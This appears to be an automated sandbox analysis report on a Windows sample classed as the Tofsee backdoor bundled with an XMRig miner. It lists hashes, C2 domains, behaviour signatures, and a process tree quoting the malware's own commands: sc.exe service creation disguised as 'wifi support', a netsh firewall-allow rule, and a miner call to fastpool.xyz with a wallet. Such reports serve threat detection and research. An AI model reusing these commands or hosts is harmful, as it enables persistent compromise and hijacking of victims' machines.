Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-03-2023 21:52

General

  • Target

    file.exe

  • Size

    265KB

  • MD5

    cd8743aa91752e2e02571b2fe3a1c27b

  • SHA1

    3ba45028288170cfa3f137f5ce8924f0fbf6d36f

  • SHA256

    e3c7793b26883da4922c5bc91a769b0c1345badc04c967e5f89177aaf8364ea7

  • SHA512

    903cf7987825b983fcb7b87ef2900c61dbb5e92ded53191839be2ddf68cf09849fdd7399ae10766d9e5d1f5aa89dd1d4e32f6024e96bd7dac3645c5939017274

  • SSDEEP

    3072:FzSyRHyNFTsVxLZfLOAFGCluuTqoJUR1d5rFIjRu4xDYFLdBL5kMpDCU3wsUf2:9P5yNmVxLt4KmoaR1d5ralfxDYRSMp

Malware Config

Extracted

Family

tofsee

C2

vanaheim.cn

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 8 IoCs
  • Creates new service(s) 1 TTPs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2348
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\kwglhfxj\
      2⤵
        PID:3552
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\coafcihv.exe" C:\Windows\SysWOW64\kwglhfxj\
        2⤵
          PID:5100
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create kwglhfxj binPath= "C:\Windows\SysWOW64\kwglhfxj\coafcihv.exe /d\"C:\Users\Admin\AppData\Local\Temp\file.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:1140
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description kwglhfxj "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:1696
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start kwglhfxj
          2⤵
          • Launches sc.exe
          PID:1900
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:3076
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2348 -s 1044
          2⤵
          • Program crash
          PID:436
      • C:\Windows\SysWOW64\kwglhfxj\coafcihv.exe
        C:\Windows\SysWOW64\kwglhfxj\coafcihv.exe /d"C:\Users\Admin\AppData\Local\Temp\file.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2876
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Sets service image path in registry
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:4388
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3316
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 512
          2⤵
          • Program crash
          PID:1828
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 2348 -ip 2348
        1⤵
          PID:244
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2876 -ip 2876
          1⤵
            PID:264

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\coafcihv.exe
            Filesize

            11.9MB

            MD5

            a90508d116f60412d3743168f5e79864

            SHA1

            131ec2e38a8c66910f719bb8a4f3d57238ae4a2c

            SHA256

            874ef656d986becd8447205619c11f2c99ba36c6ad334dad3617ef41c873fc15

            SHA512

            c88b993baa42703bed226480eb1d0157e01b384e325984d6343f25310f4706a2f5b98661e7aa1cda5e4e7ae6d93826894f2784aaa420a54b72bfc7658f3cdf76

          • C:\Windows\SysWOW64\kwglhfxj\coafcihv.exe
            Filesize

            11.9MB

            MD5

            a90508d116f60412d3743168f5e79864

            SHA1

            131ec2e38a8c66910f719bb8a4f3d57238ae4a2c

            SHA256

            874ef656d986becd8447205619c11f2c99ba36c6ad334dad3617ef41c873fc15

            SHA512

            c88b993baa42703bed226480eb1d0157e01b384e325984d6343f25310f4706a2f5b98661e7aa1cda5e4e7ae6d93826894f2784aaa420a54b72bfc7658f3cdf76

          • memory/2348-143-0x0000000000400000-0x0000000000705000-memory.dmp
            Filesize

            3.0MB

          • memory/2348-135-0x0000000002440000-0x0000000002453000-memory.dmp
            Filesize

            76KB

          • memory/2876-142-0x0000000000400000-0x0000000000705000-memory.dmp
            Filesize

            3.0MB

          • memory/3316-199-0x0000000000400000-0x00000000004F1000-memory.dmp
            Filesize

            964KB

          • memory/3316-195-0x0000000000400000-0x00000000004F1000-memory.dmp
            Filesize

            964KB

          • memory/3316-197-0x0000000000400000-0x00000000004F1000-memory.dmp
            Filesize

            964KB

          • memory/3316-198-0x0000000000400000-0x00000000004F1000-memory.dmp
            Filesize

            964KB

          • memory/3316-196-0x0000000000400000-0x00000000004F1000-memory.dmp
            Filesize

            964KB

          • memory/3316-194-0x0000000000400000-0x00000000004F1000-memory.dmp
            Filesize

            964KB

          • memory/3316-193-0x0000000000400000-0x00000000004F1000-memory.dmp
            Filesize

            964KB

          • memory/3316-188-0x0000000000400000-0x00000000004F1000-memory.dmp
            Filesize

            964KB

          • memory/4388-168-0x0000000001F40000-0x0000000001F50000-memory.dmp
            Filesize

            64KB

          • memory/4388-173-0x0000000001F40000-0x0000000001F50000-memory.dmp
            Filesize

            64KB

          • memory/4388-160-0x0000000001F40000-0x0000000001F50000-memory.dmp
            Filesize

            64KB

          • memory/4388-161-0x0000000001F40000-0x0000000001F50000-memory.dmp
            Filesize

            64KB

          • memory/4388-162-0x0000000001F40000-0x0000000001F50000-memory.dmp
            Filesize

            64KB

          • memory/4388-164-0x0000000001F40000-0x0000000001F50000-memory.dmp
            Filesize

            64KB

          • memory/4388-163-0x0000000001F40000-0x0000000001F50000-memory.dmp
            Filesize

            64KB

          • memory/4388-165-0x0000000001F40000-0x0000000001F50000-memory.dmp
            Filesize

            64KB

          • memory/4388-166-0x0000000001F40000-0x0000000001F50000-memory.dmp
            Filesize

            64KB

          • memory/4388-156-0x0000000001F40000-0x0000000001F50000-memory.dmp
            Filesize

            64KB

          • memory/4388-167-0x0000000001F40000-0x0000000001F50000-memory.dmp
            Filesize

            64KB

          • memory/4388-169-0x0000000001F40000-0x0000000001F50000-memory.dmp
            Filesize

            64KB

          • memory/4388-170-0x0000000001F40000-0x0000000001F50000-memory.dmp
            Filesize

            64KB

          • memory/4388-171-0x0000000001F40000-0x0000000001F50000-memory.dmp
            Filesize

            64KB

          • memory/4388-172-0x0000000001F40000-0x0000000001F50000-memory.dmp
            Filesize

            64KB

          • memory/4388-159-0x0000000001F40000-0x0000000001F50000-memory.dmp
            Filesize

            64KB

          • memory/4388-174-0x0000000001F40000-0x0000000001F50000-memory.dmp
            Filesize

            64KB

          • memory/4388-175-0x0000000001F40000-0x0000000001F50000-memory.dmp
            Filesize

            64KB

          • memory/4388-176-0x0000000001FD0000-0x0000000001FD5000-memory.dmp
            Filesize

            20KB

          • memory/4388-179-0x0000000001FD0000-0x0000000001FD5000-memory.dmp
            Filesize

            20KB

          • memory/4388-180-0x0000000007780000-0x0000000007B8B000-memory.dmp
            Filesize

            4.0MB

          • memory/4388-183-0x0000000007780000-0x0000000007B8B000-memory.dmp
            Filesize

            4.0MB

          • memory/4388-184-0x0000000001FE0000-0x0000000001FE7000-memory.dmp
            Filesize

            28KB

          • memory/4388-153-0x0000000001F30000-0x0000000001F36000-memory.dmp
            Filesize

            24KB

          • memory/4388-152-0x0000000002800000-0x0000000002A0F000-memory.dmp
            Filesize

            2.1MB

          • memory/4388-149-0x0000000002800000-0x0000000002A0F000-memory.dmp
            Filesize

            2.1MB

          • memory/4388-148-0x00000000009B0000-0x00000000009C5000-memory.dmp
            Filesize

            84KB

          • memory/4388-146-0x00000000009B0000-0x00000000009C5000-memory.dmp
            Filesize

            84KB

          • memory/4388-145-0x00000000009B0000-0x00000000009C5000-memory.dmp
            Filesize

            84KB

          • memory/4388-144-0x00000000009B0000-0x00000000009C5000-memory.dmp
            Filesize

            84KB

          • memory/4388-139-0x00000000009B0000-0x00000000009C5000-memory.dmp
            Filesize

            84KB